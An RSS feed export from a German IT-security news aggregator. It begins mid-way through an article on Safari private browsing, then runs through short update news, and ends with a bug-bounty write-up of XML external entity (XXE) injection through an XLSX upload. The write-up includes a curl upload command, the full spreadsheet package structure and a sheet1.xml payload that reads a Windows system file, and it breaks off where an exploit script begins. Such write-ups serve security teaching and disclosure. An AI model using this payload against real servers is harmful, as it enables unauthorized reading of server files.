<p>Chrome may get far more attention for its Incognito than any other browser — no surprise, since it’s by far the most popular browser on the planet — but Apple’s Safari was actually the first to introduce private browsing. The term <i>private browsing</i> was first bandied in 2005 to describe early Safari features that limited what was saved by the browser.</p>



<p>Side note: Early in private browsing, the label <i>porn mode</i> was often used as a synonym to describe what many writers and reporters assumed was the primary application of the feature. The term has fallen out of favor.</p>



<p>To open what Safari calls a Private Window on a Mac, users can do a three-key combination of <strong>Command-Shift-N</strong>, the same shortcut Chrome adopted. Otherwise, a window can be called up by selecting the <strong>File</strong> menu and clicking on New Private Window.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="803" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>From the File menu in Safari, selecting New Private Window gets you started.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Safari tags each Private Window by darkening the address bar. It also issues a reminder of what it does — or more accurately — what it doesn’t do. “Safari will keep your browsing history private for all tabs of this window. After you close this window, Safari won’t remember the pages you visited, your search history or your AutoFill information,” the top-of-the-page note reads. The warning is more terse than those of other browsers and omits cautions about still-visible online activity.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="321" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The darkened address bar at the top — and the Private button in the left window corner — signal that this Safari window is for private browsing.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Like Firefox, Safari automatically engages additional privacy technologies, whether the user browses in standard or private mode. Safari’s Intelligent Tracking Protection (ITP), which has been around for nearly a decade and repeatedly upgraded, now blocks all third-party cookies, among other components advertisers and services use to track people as they bounce from one site to another. ITP is controlled by a single on-off switch — on is the default — found in <strong>Preferences</strong> under the <strong>Privacy</strong> icon. If the <strong>Website tracking:</strong> box is checked to mark <strong>Prevent cross-site tracking</strong>, ITP is on.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="453" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Switching on cross-site tracking enables Safari’s Intelligent Tracking Protection, which blocks a wide variety of bits advertisers try to use to follow you around the web while you’re using a Private Window.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>A link can be opened directly to a Private Window by right-clicking, then selecting <strong>Open Link in New Private Window</strong>. Close a Private Window just as any Safari window, by clicking the red dot in the upper left corner of the browser frame.</p>



<p><strong>Pro tip:</strong> <i>Once in a Safari Private Window, opening a new tab — either by clicking the + icon at the upper right or by using the Command-T key combo — omits the Private Browsing Enabled notice. (The darkened address bar remains as the sole indicator of a private browsing session.) Other browsers, such as Firefox, repeat their cautionary messages each time a tab is opened in an incognito session.</i></p>



<p><strong>Related reading:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/1717405/googles-chromium-browser-explained.html">Chromium explained: How the open-source engine drives today’s browsers</a></li>



<li><a href="https://www.computerworld.com/article/4083528/ai-web-browsers-are-cool-helpful-and-utterly-untrustworthy.html">AI web browsers are cool, helpful, and utterly untrustworthy</a></li>



<li><a href="https://www.computerworld.com/article/3996011/ai-windows-web-browser.html">How AI will transform your Windows web browser</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 152.0.5: Mozilla behebt Fehler bei den Zahlungsmethoden]]></title>
<description><![CDATA[Kurzer Hinweis für alle, die mit dem Browser Firefox unterwegs sind: Mozilla hat ein kleines Update veröffentlicht. Ab sofort steht die Version 152.0.5 zum Download bereit. Ein großes Feature-Feuerwerk solltet ihr mit diesem Update natürlich nicht erwarten, denn es handelt...Zum Beitrag: Firefox ...]]></description>
<link>https://tsecurity.de/de/3651780/it-nachrichten/firefox-15205-mozilla-behebt-fehler-bei-den-zahlungsmethoden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651780/it-nachrichten/firefox-15205-mozilla-behebt-fehler-bei-den-zahlungsmethoden/</guid>
<pubDate>Tue, 07 Jul 2026 16:04:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurzer Hinweis für alle, die mit dem Browser Firefox unterwegs sind: Mozilla hat ein kleines Update veröffentlicht. Ab sofort steht die Version 152.0.5 zum Download bereit. Ein großes Feature-Feuerwerk solltet ihr mit diesem Update natürlich nicht erwarten, denn es handelt...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/firefox-152-0-5-mozilla-behebt-fehler-bei-den-zahlungsmethoden/">Firefox 152.0.5: Mozilla behebt Fehler bei den Zahlungsmethoden</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenSSH bringt erstmals hybride Post-Quantum-Signaturen]]></title>
<description><![CDATA[OpenSSH 10.4 behebt mehrere Sicherheitslücken in SSH, SCP und SFTP. Zudem gibt es Protokollverschärfungen und experimentelle Post-Quantum-Signaturen.]]></description>
<link>https://tsecurity.de/de/3651583/it-nachrichten/openssh-bringt-erstmals-hybride-post-quantum-signaturen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651583/it-nachrichten/openssh-bringt-erstmals-hybride-post-quantum-signaturen/</guid>
<pubDate>Tue, 07 Jul 2026 15:03:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenSSH 10.4 behebt mehrere Sicherheitslücken in SSH, SCP und SFTP. Zudem gibt es Protokollverschärfungen und experimentelle Post-Quantum-Signaturen.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenSSH bringt erstmals hybride Post-Quantum-Signaturen]]></title>
<description><![CDATA[OpenSSH 10.4 behebt mehrere Sicherheitslücken in SSH, SCP und SFTP. Zudem gibt es Protokollverschärfungen und experimentelle Post-Quantum-Signaturen.]]></description>
<link>https://tsecurity.de/de/3651525/it-security-nachrichten/openssh-bringt-erstmals-hybride-post-quantum-signaturen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651525/it-security-nachrichten/openssh-bringt-erstmals-hybride-post-quantum-signaturen/</guid>
<pubDate>Tue, 07 Jul 2026 14:39:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenSSH 10.4 behebt mehrere Sicherheitslücken in SSH, SCP und SFTP. Zudem gibt es Protokollverschärfungen und experimentelle Post-Quantum-Signaturen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows-Update behebt Speicherloch]]></title>
<description><![CDATA[Die Datei CapabilityAccessManager.db-wal kann Hunderte Gigabyte Speicherplatz fressen. Ein Windows-Update soll Abhilfe schaffen.]]></description>
<link>https://tsecurity.de/de/3651386/it-nachrichten/windows-update-behebt-speicherloch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651386/it-nachrichten/windows-update-behebt-speicherloch/</guid>
<pubDate>Tue, 07 Jul 2026 13:48:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Datei CapabilityAccessManager.db-wal kann Hunderte Gigabyte Speicherplatz fressen. Ein Windows-Update soll Abhilfe schaffen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird für Android: Update auf Version 20.1 behebt Absturzursachen]]></title>
<description><![CDATA[Kurzer Hinweis für alle, die Thunderbird auf ihrem Android-Smartphone oder-Tablet nutzen: Die Entwickler haben die Version 20.1 des mobilen E-Mail-Clients veröffentlicht. Bei dem Release handelt es sich um ein reines Wartungs-Update, das sich gezielt um unschöne Abstürze kümmert. Unter der...Zum ...]]></description>
<link>https://tsecurity.de/de/3651146/it-nachrichten/thunderbird-fuer-android-update-auf-version-201-behebt-absturzursachen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651146/it-nachrichten/thunderbird-fuer-android-update-auf-version-201-behebt-absturzursachen/</guid>
<pubDate>Tue, 07 Jul 2026 12:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurzer Hinweis für alle, die Thunderbird auf ihrem Android-Smartphone oder-Tablet nutzen: Die Entwickler haben die Version 20.1 des mobilen E-Mail-Clients veröffentlicht. Bei dem Release handelt es sich um ein reines Wartungs-Update, das sich gezielt um unschöne Abstürze kümmert. Unter der...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-fuer-android-update-auf-version-20-1-behebt-absturzursachen/">Thunderbird für Android: Update auf Version 20.1 behebt Absturzursachen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Coolify behebt mehrere schwere Sicherheitslücken - All About Security]]></title>
<description><![CDATA[All About Security Das Online-Magazin zu Cybersecurity (Cybersicherheit). Ransomware, Phishing · Home · News · Newsletter · Management · Netzwerke.]]></description>
<link>https://tsecurity.de/de/3650871/it-security-nachrichten/coolify-behebt-mehrere-schwere-sicherheitsluecken-all-about-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650871/it-security-nachrichten/coolify-behebt-mehrere-schwere-sicherheitsluecken-all-about-security/</guid>
<pubDate>Tue, 07 Jul 2026 10:24:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[All About <b>Security</b> Das Online-Magazin zu Cybersecurity (Cybersicherheit). Ransomware, Phishing · Home · News · Newsletter · Management · Netzwerke.]]></content:encoded>
</item>
<item>
<title><![CDATA[Safari öffnet KI-Agenten den Browser: Neues MCP-Werkzeug vorgestellt]]></title>
<description><![CDATA[Apple erweitert die experimentelle Version von Safari um eine neue Funktion für Webentwickler. Mit der Safari Technology Preview 247 führt das Unternehmen einen sogenannten Safari MCP-Server ein. Die Abkürzung steht für „Model Context Protocol“. Dahinter verbirgt sich eine Schnittstelle, über die...]]></description>
<link>https://tsecurity.de/de/3650569/ios-mac-os/safari-oeffnet-ki-agenten-den-browser-neues-mcp-werkzeug-vorgestellt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650569/ios-mac-os/safari-oeffnet-ki-agenten-den-browser-neues-mcp-werkzeug-vorgestellt/</guid>
<pubDate>Tue, 07 Jul 2026 07:39:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/safari-oeffnet-ki-agenten-den-browser-neues-mcp-werkzeug-vorgestellt-283176/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2026/07/safari-preview-150x150.png" class="alignright tfe wp-post-image" alt="Safari Preview" decoding="async"></a><p>Apple erweitert die experimentelle Version von Safari um eine neue Funktion für Webentwickler. Mit der Safari Technology Preview 247 führt das Unternehmen einen sogenannten Safari MCP-Server ein. Die Abkürzung steht für „Model Context Protocol“. Dahinter verbirgt sich eine Schnittstelle, über die KI-gestützte Entwicklungswerkzeuge direkt mit einem geöffneten Safari-Fenster kommunizieren können. Bislang mussten Entwickler Fehler häufig […]</p>
<p>The post <a href="https://www.ifun.de/safari-oeffnet-ki-agenten-den-browser-neues-mcp-werkzeug-vorgestellt-283176/">Safari öffnet KI-Agenten den Browser: Neues MCP-Werkzeug vorgestellt</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Neues Update behebt ab sofort ungewöhnlichen Fehler]]></title>
<description><![CDATA[Kaum ein Auto kommt heutzutage ohne intelligente Fahrassistenz aus. Ein besonders beliebtes System stammt dabei von Android.]]></description>
<link>https://tsecurity.de/de/3650521/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650521/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</guid>
<pubDate>Tue, 07 Jul 2026 07:18:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kaum ein Auto kommt heutzutage ohne intelligente Fahrassistenz aus. Ein besonders beliebtes System stammt dabei von Android.]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Beta 3: Here Are All the New Features Apple Added]]></title>
<description><![CDATA[Apple has released iOS 27 beta 3 for developers, bringing another round of refinements as the company continues testing its next major iPhone software update. The new beta focuses on Siri, Apple Intelligence, Shortcuts, Accessibility, Control Center, and several interface improvements while fixin...]]></description>
<link>https://tsecurity.de/de/3650459/ios-mac-os/ios-27-beta-3-here-are-all-the-new-features-apple-added/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650459/ios-mac-os/ios-27-beta-3-here-are-all-the-new-features-apple-added/</guid>
<pubDate>Tue, 07 Jul 2026 06:08:51 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released iOS 27 beta 3 for developers, bringing another round of refinements as the company continues testing its next major iPhone software update. The new beta focuses on Siri, Apple Intelligence, Shortcuts, Accessibility, Control Center, and several interface improvements while fixing and polishing features introduced in earlier builds.



Developers can download iOS 27 beta 3 now, while Apple is expected to release the first public beta later this month. The final version of iOS 27 is scheduled to arrive this September alongside the next iPhone lineup.



Table of contentsHow to InstallEverything New in iOS 27 Beta 3Siri gets more customizationNew Live Recognition accessibility featureSafari introduces four new featuresPhotos gains rating controlsShortcuts offers two creation modesControl Center shows network detailsReminders receives a refreshed iconWallpaper animation looks betterAirPods Adaptive Audio gets more controlHome app requirement becomes clearerMaps improves route settingsLock Screen icons change appearanceBetter app icon appearancemacOS receives new wallpaperswatchOS adds Siri AIApple Intelligence downloads again5G+ support arrives in IndiaDevice CompatibilityFinal Thoughts



How to Install



If your Apple ID is enrolled in the Apple Developer Program, you can install the latest beta by following these steps:




Open Settings.



Tap General.



Select Software Update.



Open Beta Updates.



Choose iOS 27 Developer Beta.



Download and install the update.




Apple still recommends installing developer betas only on a secondary device because early software builds often include bugs, battery drain, app compatibility issues, and unexpected performance problems.



Everything New in iOS 27 Beta 3



Siri gets more customization







Apple has finally enabled Siri voice customization on supported devices. Users can now adjust both Pace and Expressivity, making Siri sound faster, slower, or more expressive based on personal preference.



This feature currently requires compatible Apple Intelligence hardware because voice processing happens directly on the device.



Apple also updated several Siri-related interfaces. The Settings app now displays Optimizing Search and Siri while indexing, and Camera's new Siri Mode also requires the updated Siri experience before becoming available.



New Live Recognition accessibility feature







Apple added a new Live Recognition section inside Accessibility settings.



The feature uses on-device intelligence together with the camera to identify objects, describe surroundings, answer questions about what it sees, and support custom activities. It expands Apple's accessibility tools while keeping processing on the device.



Safari introduces four new features



The first time users open Safari after updating, Apple highlights four new capabilities:




Automatically organize tabs



Browse bookmarks by topic



Receive page updates with Notify Me



Create custom extensions




These additions continue Apple's effort to make Safari more intelligent and easier to manage.



Photos gains rating controls



The Photos section inside Settings now includes a Show Rating Controls option.



When enabled, users can add star ratings to photos and videos while also displaying rating badges directly on thumbnails for quicker organization.



Shortcuts offers two creation modes



Creating a new shortcut now gives users a choice between opening the new natural language interface or launching directly into the traditional manual editor.



This makes Shortcuts more flexible for both beginners and experienced users.



Control Center shows network details







Control Center now displays your cellular signal strength and network type even while your iPhone remains connected to Wi-Fi.



You can quickly see whether your device is connected to LTE, 5G, or another cellular network without leaving Control Center.



Reminders receives a refreshed icon







Apple has redesigned the Reminders app icon with Liquid Glass styling.



The updated design replaces the previous solid colored bullets with hollow colored circles, giving the icon a cleaner appearance that better matches the rest of iOS 27.



Wallpaper animation looks better



When you pull down Notification Center, the subject from your wallpaper now appears above the Home Screen or the app you are currently using, creating a smoother layered effect.



AirPods Adaptive Audio gets more control



Users can now adjust the Adaptive Audio experience with a new slider that lets them choose between greater transparency or stronger noise cancellation.



Home app requirement becomes clearer



Apple now explains that Apple Intelligence features inside the Home app require an active 2TB iCloud+ subscription.



Maps improves route settings



Maps now includes a helpful tooltip that explains where route preferences are located, making it easier to find options when planning directions.



Lock Screen icons change appearance



The Lock Screen shortcuts for Control Center now use black icons instead of white icons on certain wallpapers, improving visibility.



Better app icon appearance



Apple softened the specular highlights used on app icons, making clear and tinted icons appear smoother throughout the system.



macOS receives new wallpapers



Alongside iOS 27 beta 3, Apple also added new Golden Gate Bridge wallpapers and screen savers in macOS 27.



watchOS adds Siri AI



watchOS 27 beta 3 introduces Siri AI support along with a standalone Siri app on supported Apple Watch models.



Apple Intelligence downloads again



Some users reported that installing beta 3 forces Apple Intelligence assets to download again, temporarily resetting access to the updated Siri experience until installation finishes.



5G+ support arrives in India



Apple has enabled 5G+ branding in India for supported mobile carriers, allowing compatible iPhones to display the upgraded network indicator where available.



Device Compatibility



iOS 27 supports:




iPhone 11 and newer



iPhone SE (2nd generation) and newer




Apple Intelligence and the latest Siri features require newer supported hardware, so not every iPhone running iOS 27 will receive every feature.



Final Thoughts



iOS 27 beta 3 focuses on refining features Apple introduced earlier instead of adding major surprises. Siri customization finally works, Accessibility gains a powerful Live Recognition feature, Photos and Shortcuts become more flexible, and several smaller interface improvements make the overall experience feel more polished.



Apple will continue testing iOS 27 throughout the summer before releasing the public beta in July and the stable update for all supported iPhones this September.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Neues Update behebt ab sofort ungewöhnlichen Fehler]]></title>
<description><![CDATA[Wer ein Android-Gerät und ein Auto besitzt, kennt vermutlich bereits die Vorteile von Android Auto. Doch manchmal kommt es dort auch zu Problemen.]]></description>
<link>https://tsecurity.de/de/3648081/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648081/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</guid>
<pubDate>Mon, 06 Jul 2026 09:32:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer ein Android-Gerät und ein Auto besitzt, kennt vermutlich bereits die Vorteile von Android Auto. Doch manchmal kommt es dort auch zu Problemen.]]></content:encoded>
</item>
<item>
<title><![CDATA[The File That Answered Back — XXE Hidden in Cell A2]]></title>
<description><![CDATA[Most people know XXE. Few think to look for it inside a spreadsheet upload. But beneath every .xlsx is really a ZIP archive full of XML, and the parser reading it doesn’t always know where to stop. This is the writeup of finding one that didn’t, and what it quietly handed back.The WallThe first t...]]></description>
<link>https://tsecurity.de/de/3647966/hacking/the-file-that-answered-back-xxe-hidden-in-cell-a2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647966/hacking/the-file-that-answered-back-xxe-hidden-in-cell-a2/</guid>
<pubDate>Mon, 06 Jul 2026 08:53:00 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*O29aTyx3TXMUBqM2BvQ3eA.png"></figure><blockquote>Most people know XXE. Few think to look for it inside a spreadsheet upload. But beneath every .xlsx is really a ZIP archive full of XML, and the parser reading it doesn’t always know where to stop. This is the writeup of finding one that didn’t, and what it quietly handed back.</blockquote><h3>The Wall</h3><p><em>The first thing I discovered wasn’t a vulnerability. It was a pattern.</em></p><p>Almost every asset was behind the same wall: Imperva, a web application firewall so common in enterprise deployments that you almost expect it now. On its own, a WAF isn’t an ending. It’s a conversation. You probe, you learn what it blocks and how, you find the shape of the rules. But this one was doing something specific that changed the entire character of the hunt. <em>It was blocking the word `DOCTYPE`.</em></p><p>Not entire payloads. Not suspicious looking XML structures. Just the presence of that one keyword, anywhere inside a POST body, was enough to return a 403 before the request ever touched any application. For context: `DOCTYPE` is the entry point for XML External Entity injection, the vulnerability class that lets you instruct an XML parser to read files off the server’s filesystem and hand them back to you. Without `DOCTYPE`, that entire attack surface disappears.</p><p>I confirmed this across the program’s Japanese portals, Korean WebLogic applications, Brazilian upload forms, AEM content management systems. Every time, a 403. The wall held.</p><h3>Learning to Read a Name</h3><p>The assets in one particular region felt different from the start. Different infrastructure, different cloud providers, different WAF signatures. And among them, one domain resolved to an Alibaba Cloud IP with an F5 load balancer behind it. No Imperva signature in any response header. No `incap` cookies. No bot-detection challenges. <em>The wall wasn’t there</em>.</p><p>What was there was a URL path I had to look at twice.</p><pre>/[REDACTED]/personal/CombineExcelUpload</pre><p>I’ve learned over time that endpoint names are often the most honest thing about a web application. Developers name things after what they do. And this name said three things at once: it accepts Excel files, it uploads them, and it <em>combines</em>, meaning it doesn’t just store the file, it reads it. The name of the endpoint was practically a confession of the vulnerability class.</p><p><strong>`CombineExcelUpload`. Server-side Excel processing. No authentication required.</strong></p><h3>The Thing About Spreadsheets</h3><p>Here is something that took me a while to really internalize, and now I think about it almost every time I see a file upload endpoint.</p><p><strong>An XLSX file is not a spreadsheet. Not at the parser level.</strong></p><p>An XLSX file is a ZIP archive containing a structured set of XML documents, defined by the Office Open XML (OOXML) standard. Open any `.xlsx` file with a ZIP extractor and you’ll find a whole internal world: folders, XML files, namespace declarations, hiding inside something that looks like a simple grid of numbers. The architecture looks like this:</p><pre>document.xlsx  (it's actually a ZIP)<br>│<br>├── [Content_Types].xml        ← declares MIME types for every internal part<br>├── _rels/<br>│   └── .rels                  ← links the package root to the workbook<br>└── xl/<br>    ├── workbook.xml            ← defines the workbook and its sheets<br>    ├── _rels/<br>    │   └── workbook.xml.rels   ← links the workbook to its sheet files<br>    └── worksheets/<br>        └── sheet1.xml          ← the actual cell data  ←  this is where we live</pre><p>Every file in that tree is XML. And the one that contains your cell values, `xl/worksheets/sheet1.xml`, is parsed by whichever XML library the server uses to read the spreadsheet.</p><p>If that library has external entity resolution enabled (which is the <strong>default</strong> in older .NET codebases, because the insecure behavior is the default, not the exception) then you can put something inside `sheet1.xml` that the parser was never meant to see. A declaration that says: *before you read this cell’s value, go open this file on the filesystem and put its contents here instead.*</p><p>The mechanism, written out plainly:</p><pre>XML parser reads sheet1.xml<br>  → encounters &lt;!DOCTYPE&gt; with external entity declaration<br>  → entity points to file:///C:/windows/win.ini<br>  → parser opens that file, reads its content<br>  → substitutes the content in place of &amp;xxe; inside the &lt;v&gt; tag<br>  → application reads the cell value<br>  → application returns it in the JSON response<br>  → the file content is now in your terminal</pre><p>That’s the whole chain. It uses the system exactly as designed, just with an input the designer never imagined someone would give it.</p><h3>The First Test: Does It Reflect?</h3><p>Before building any payload, I asked a simpler question. Does this endpoint actually read the cell content and return it? Or does it just accept the file and store it somewhere opaque?</p><p>I built the most minimal valid XLSX I could, nothing malicious, just a proper ZIP structure with a single cell containing the string `TestValue`, and uploaded it:</p><pre>curl -s -X POST "https://[REDACTED]/[REDACTED]/CombineExcelUpload" \<br>  -H "Referer: https://[REDACTED]/[REDACTED]/index" \<br>  -F "excelFile=@test.xlsx;type=application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"</pre><p>The response came back:</p><pre>{"uploadResult":"TestValue","responseCode":"1"}</pre><p>The endpoint read the cell. The endpoint returned the cell. The reflection was there.</p><p>That moment is quieter than you’d expect. There’s no alarm, no flashing light. Just a JSON field containing a word you put into a spreadsheet, coming back to you from a server you don’t control. It’s small. But it means everything, because it tells you the machinery is in place. The application is actively parsing the file and surfacing its contents. Which means if we control what the parser puts into that cell, we control what appears in the response.</p><h3>Building the Payload: From the Inside Out</h3><p>This is the part I want to be specific about, because it’s where most writeups wave their hand and say “craft a malicious XLSX.” The detail matters.</p><p>An XLSX file must be a valid ZIP archive with all five required files present, or the parser will reject it as malformed before it ever touches the worksheet XML. That means building the payload from scratch. Not modifying an existing spreadsheet, not using automated tools that produce broken structure, but assembling each piece by hand.</p><p>Here is what goes in each file :</p><blockquote><strong>`[Content_Types].xml`:</strong> the package manifest. Declares what MIME type each internal file represents. Without this, the parser doesn’t know what it’s looking at</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"&gt;<br>  &lt;Default Extension="rels"<br>    ContentType="application/vnd.openxmlformats-package.relationships+xml"/&gt;<br>  &lt;Default Extension="xml" ContentType="application/xml"/&gt;<br>  &lt;Override PartName="/xl/workbook.xml"<br>    ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/&gt;<br>  &lt;Override PartName="/xl/worksheets/sheet1.xml"<br>    ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/&gt;<br>&lt;/Types&gt;</pre><blockquote><strong>`_rels/.rels`:</strong> the root relationship file. Tells the parser the main document in this package is `xl/workbook.xml`.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"&gt;<br>  &lt;Relationship Id="rId1"<br>    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"<br>    Target="xl/workbook.xml"/&gt;<br>&lt;/Relationships&gt;</pre><blockquote><strong>`xl/workbook.xml`:</strong> the workbook definition. Declares one sheet named Sheet1, linked by relationship ID `rId1`.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/ml/2006/main"<br>          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"&gt;<br>  &lt;sheets&gt;<br>    &lt;sheet name="Sheet1" sheetId="1" r:id="rId1"/&gt;<br>  &lt;/sheets&gt;<br>&lt;/workbook&gt;</pre><blockquote><strong>`xl/_rels/workbook.xml.rels`:</strong> links `rId1` in the workbook to the actual sheet file.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"&gt;<br>  &lt;Relationship Id="rId1"<br>    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"<br>    Target="worksheets/sheet1.xml"/&gt;<br>&lt;/Relationships&gt;</pre><blockquote><strong>`xl/worksheets/sheet1.xml`: </strong>this is the payload. The `DOCTYPE` declaration at the top defines an external entity named `xxe` whose value is the contents of a file on the server. The `&amp;xxe;` reference inside the cell instructs the parser to resolve it.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;!DOCTYPE foo ..(Syntax -&gt; `[&lt;!` (medium Prevent the full code here*)) ENTITY xxe SYSTEM "file:///C:/windows/win.ini"&gt;]&gt;<br>&lt;worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/ml/2006/main"&gt;<br>  &lt;sheetData&gt;<br>    &lt;row r="1"&gt;&lt;c r="A1" t="str"&gt;&lt;v&gt;PolicyNo&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>    &lt;row r="2"&gt;&lt;c r="A2" t="str"&gt;&lt;v&gt;&amp;xxe;&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>  &lt;/sheetData&gt;<br>&lt;/worksheet&gt;</pre><p>A few choices here worth explaining. The `DOCTYPE foo` element name is arbitrary. It just needs to be a valid XML name. Cell A1 contains benign data to make the file look like a legitimate upload. Cell A2 is where the exfiltrated content will land. The `t=”str”` attribute declares it as a string type, which matters because numeric cell types get processed differently and can break the substitution.</p><p>The target file, `C:\windows\win.ini`, was chosen deliberately for the first proof: it’s world-readable on all Windows versions, it’s short, and critically, it contains **no XML special characters** (`&lt;`, `&gt;`, `&amp;`). Files that contain those characters break the outer XML document when substituted inline. The parser treats them as XML syntax rather than cell data, throws a parse error, and the read fails silently. `win.ini`, `system.ini`, and `hosts` are all safe targets for initial confirmation. `web.config` is not.</p><h3>The Exploit Time</h3><p>To turn the structure described above into a live test, I wrote a script that assembled all five XML files, packed them into a valid ZIP with an `.xlsx` extension, and posted the result to the upload endpoint in a single pass.</p><p>The four support files ([Content_Types].xml, .rels, workbook.xml, workbook.xml.rels) are static boilerplate that never change between reads. The only file that varies is `sheet1.xml`, where the target path gets injected at the `ENTITY` declaration:</p><pre>## Construct from Building the Payload segment<br>...<br>...<br>TARGET_FILE = 